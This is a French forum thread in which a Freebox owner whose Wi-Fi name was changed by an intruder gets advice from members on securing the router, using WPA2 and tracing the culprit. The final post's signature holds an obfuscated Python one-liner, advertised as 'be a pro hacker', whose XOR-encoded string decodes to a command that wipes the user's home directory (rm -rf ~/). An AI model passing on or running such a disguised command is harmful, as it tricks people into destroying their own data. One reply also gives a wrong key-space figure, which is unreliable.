Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 22-03-2013 12:06:02

GrosCraquage
N00b

Securiser son réseau et trouver le pirate

Bonjour,

Ce matin je me suis fait pirater mon reseau WIFI Free, cette personne (sans doute un voisin) a changé mon SSID qui s'apellait "ODIL" et l'a changé en "Sexe_en_Fusion"

Voila je n'y connait pas grand chose et je voulais savoir a quoi a t'il accès exactement pour faire cela ? Mon PC ? L'interface Free ? Données sensibles (type numero CB, messages privés etc ?)

Il y a t'il une possibilité de remonter a lui ?

Autre chose, suite a ca je viens d'essayer de parametrer mon routeur en WPA mais cela ne fonctionne pas quand je rentre la nouvelle clef mon iphone...

Je me suis fait deja pirater en 2004 avec la manip "$" m'avait t'on dit a l'epoque et depuis je cherche a configurer mes differentes box en WPA sans JAMAIS y etre parvenu !

Merci d'avance pour les réponses.

Cdl

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 22-03-2013 12:26:49

Furyo
Membre Irremplaçable
Site Web

Re : Securiser son réseau et trouver le pirate

Bonjour et Bienvenue  sur le forum wink

Ce matin je me suis fait pirater mon reseau WIFI Free, cette personne (sans doute un voisin) a changé mon SSID qui s'apellait "ODIL" et l'a changé en "Sexe_en_Fusion" 

De quelle freebox disposes-tu ? v5 ou v6?
Si il a changé ton SSID, cela veut dire qu'il a acces au routeur!! aie aie aie!!

Voila je n'y connait pas grand chose et je voulais savoir a quoi a t'il accès exactement pour faire cela ? Mon PC ? L'interface Free ? Données sensibles (type numero CB, messages privés etc ?)

Comme dis precedemment, il a accès au routeur donc il peut sniffer ce qu'il veut.. En fait tout vas dependre de son niveau de competences..

Il vas pouvoir soit voir ce qui se passe sur ton trafic internet, soit se mettre Main in the Middle pour sniffer tes infos, etc..

Maintenant qu'il est sur ton reseau et qu'il a acces au routeur et donc tous les pc/telephone/etc connectés sur ce reseau en wifi ou en LAN.

Oui

Autre chose, suite a ca je viens d'essayer de parametrer mon routeur en WPA mais cela ne fonctionne pas quand je rentre la nouvelle clef mon iphone... 

Commence deja à changer les acces à ton routeur! (nom d'utilisateur et mot de passe SURTOUT) wink

Cela ne sert à rien de fermer les fenetres quand la porte d'entrée est grande ouverte!! lol wink

Une fois que tu aurras changer ton acces au routeur (freebox), tu vas changer le cryptage de ta clef wifi non pas en WPA mais WPA2 et tu trouves une clef assez complexe (du genre  : @!§4M8°¤7f(&=1Bc+Qè8V~) (au moins un mélange de 20 caractères (chiffres/lettres(maj et minuscules)/symboles/etc...)

Je me suis fait deja pirater en 2004 avec la manip "$" m'avait t'on dit a l'epoque et depuis je cherche a configurer mes differentes box en WPA sans JAMAIS y etre parvenu ! 

Désolé pour toi ce qui montre bien encore une fois que le WEP est bien trop facile à cracker..
Pour la configuration en WPA, donne moi le modele de ta box wink

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#3 22-03-2013 16:42:47

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Bonjour Groscraquage

Le bon côté de l'histoire c'est que celui qui a cracké ton réseau l'a fait sans intention de nuire, sinon il n'aurait évidement pas changé le nom du réseau. wink
  Je dirais même qu'il t'as rendu service au bout du compte wink

A mon avis tu arrives bien trop tard pour pouvoir faire quoi que ce soit, tu pourrais en effet "l'attendre" et lui préparer quelque chose pour l'accueillir ( mais il ne repassera jamais par ta red, sinon il n'aurait pas changé l'eSSID - nom de la red )
  Donc pour moi la réponse est non, à moins que le "criminel" repasse sur les lieux du crimes.

Et puis il vaut mieux apprendre à te protéger avant de chercher à choppé le petit galopin qui a changé le nom de ton réseau. wink
  Parce que comme tu l'as déjà constaté il en sait plus que toi.

WPA ou WPA2 c'est bien wink
  Tu n'est pas obligé de mettre 20 caractères non plus, Furyo est très précautionneux, ce qui est bien, mais ne soyons pas paranos: une attaque par dictionnaire sur une clef de 8 caractères (le minimum possibles) utilisant chiffres , lettres minuscules / majuscules plus symboles, ce sont plus  8^100 possibilités, impossible pour le commun des mortels.... si tu n'as pas la CIA sur le dos tu dois pouvoir t'en tirer. tongue

Tu peux faire un truc comme ça 9PEty%XaTôNs!   
                                                J3Nny,JEt'A1Me
                                                "¡AlléL3P.5.G.!"
                                                6XeEN/_/FuZióN
           etc...   
L'important plus que la longueur de la clef c'est d'utiliser un jeux de caractères ample, en WPA ce sont 8 caractères minimum et une bonne clef de 8 caractères c'est incassable pour le commun des mortels

Pour ce qui est de l'Iphone, aucune idée, je n'ai pas de téléphone et je n'utilise pas macintosh.... tongue

#4 22-03-2013 17:36:31

GrosCraquage
N00b

Merci pour vos réponses et ce, si rapidement !

Bon, c'est quand meme asser grave hmm

@Furyo Je dispose d'une freebox V5

@Kcdtv A mon avis et si il s'agit bien d'un voisin, il pourrait repasser sur mon reseau. Je pense meme qu'il s'agit d'un nouveau voisin, celui du dessus, d'ailleurs le seul voisin qui "touche" mon appartement. Je sais qu'il est possible que le pirate soit plus loin mais il correspondrait bien au profil d'un pirate (jeune, a l'aise avec l'informatique...)

Remonter jusqu'a lui m'interesse vivement meme si je pourrais me contenter de connaitre l'activité qu'il a pu eventuelement avoir sur mon ordinateur si cela est possible ?

Je vais retenter de passer en WPA mais j'ai bien peur que je ne reussise toujours pas me conencter avec mes peripheriques... Ca c'est toujours passé comme ca tout FAI confondus depuis que j'ai Internet, la nouvelle clef generée, toujours le meme message d'erreur de code WIFI a le rentrant sur les terminaux !

#5 22-03-2013 19:14:10

Furyo
Membre Irremplaçable
Site Web

Il y a une petite chose qui me gêne dans tout ca...

Sur la freebox V5, tu ne peux acceder au routeur que par la console de gestion de ton compte via le net..

Donc le dit pirate, a accès à ta console de gestion!

- change le mot de passe de ta console de gestion car tu ne pourras pas changer celui du routeur (puisque tu n'y a pas acces) wink

Ensuite pour attraper le petit malin, ca vas être compliqué dans ton cas. (Au vue de ton niveau, bien entendu) wink

Pour ce qu'il a fait sur ton reseau, seul lui pourra te repondre.. Car en dehors du changement de nom de reseau, il est allé peut-etre plus loin, comme il a pu se laisser une porte pour revenir, comme il a pu repartir sans rien faire d'autre wink

Pour changer en WPA, tu vas te logguer sur ta console de gestion Free et tu suis la demarche : http://www.free.fr/assistance/2198-acti … -wifi.html

PENSE SURTOUT A CHANGER LE MOT DE PASSE DE TA CONSOLE DE GESTION CAR LE PIRATE CONNAIT CE CODE PUISQU IL A CHANGE LE NOM DE TON RESEAU!

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#6 22-03-2013 19:20:46

koala
Membre d'honneur
Lieu : In the sky

Le soucis dans l'histoire c'est si le voisin a récupérer tes identifiants free, car dans ce cas t'auras beau changer ta clé X fois, via l'interface free il pourra la retrouver et/ou la changer lui meme.

Change donc ton mot de passe free sur mafreebox.fr et ensuite change ta conf WPA smile

#7 22-03-2013 22:06:51

GrosCraquage
N00b

@Furyo Oui effectivement je ne peux acceder au routeur que par l'interface de ma gestion de compte. Je viens de changer le mot de passe mais est ce bien utile si il a vraiment acces a mon ordinateur ?

Sinon pour l'attraper avec un bon tuto a suivre a la lettre je pense pouvoir m'en sortir.

J'ai deja essayé de changer la clef WEP en WPA, ca fonctionne, sauf pour loguer mes terminaux au reseau WIFI une fois le changement effectué. "Echec de la connection au reseau WIFI" Quelque chose du genre...

@Koala Je n'arrive pas a acceder a mafreebox.fr ?

#8 22-03-2013 22:56:31

Anthonyy59
Membre V.I.P.

GrosCraquage a écrit :

@Furyo Oui effectivement je ne peux acceder au routeur que par l'interface de ma gestion de compte. Je viens de changer le mot de passe mais est ce bien utile si il a vraiment acces a mon ordinateur ??

Il n'a pas eu concrètement accès a ton ordinateur, il est simplement rester sur ton réseau et récuperer toute les données que tu as envoyé sur le net.

Si tu as un bon antivirus, il a peu de chance d'accèder vraiment a ton PC.

Pour remonter à sa trace je n'y connait rien mais je suis très intéressé moi aussi pour savoir.
Tu peux peut être déjà télécharger Backtrack ici, il me semble que sur Ettercap il y a un plug in qui permet de voir si il y a une attaque MITM sur ton réseau mais je ne suis pas sûr.

#9 22-03-2013 23:09:11

Furyo
Membre Irremplaçable
Site Web

Re-boot ta freebox apres validation dans la console de gestion...

Pour les appareils connectés avec ton reseau, il faut bien entendu choisir le nouveau et effacer les anciens logs dans ton ou tes peripheriques..

387003.jpg

#10 23-03-2013 10:41:53

koala
Membre d'honneur
Lieu : In the sky

Je parle des ID free que tu as pour aller sur ton compte en ligne, je ne sais pas sur la v5 mais sur la v6 toute la configuration est sauvegardée sur internet wink

#11 23-03-2013 11:43:30

Furyo
Membre Irremplaçable
Site Web

koala a écrit :

Je parle des ID free que tu as pour aller sur ton compte en ligne, je ne sais pas sur la v5 mais sur la v6 toute la configuration est sauvegardée sur internet wink

Sur la V6, tu peux accedé soit via la console de gestion en ligne soit en local sur 192.168.0.254...

Sur la V5, UNIQUEMENT via la console gestion en ligne wink (pas d'acces en local) d'où l'importance qu'il change son mot de passe dans la console de gestion wink

387003.jpg

#12 23-03-2013 15:14:01

spawn
Modérateur

Afin de retrouver celui qui a fait ça, n'y a t-il pas une section "Périphériques" ou un truc du genre dans lequel tu pourrais trouver les adresses mac des terminaux qui se sont connectés à ta box ?

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce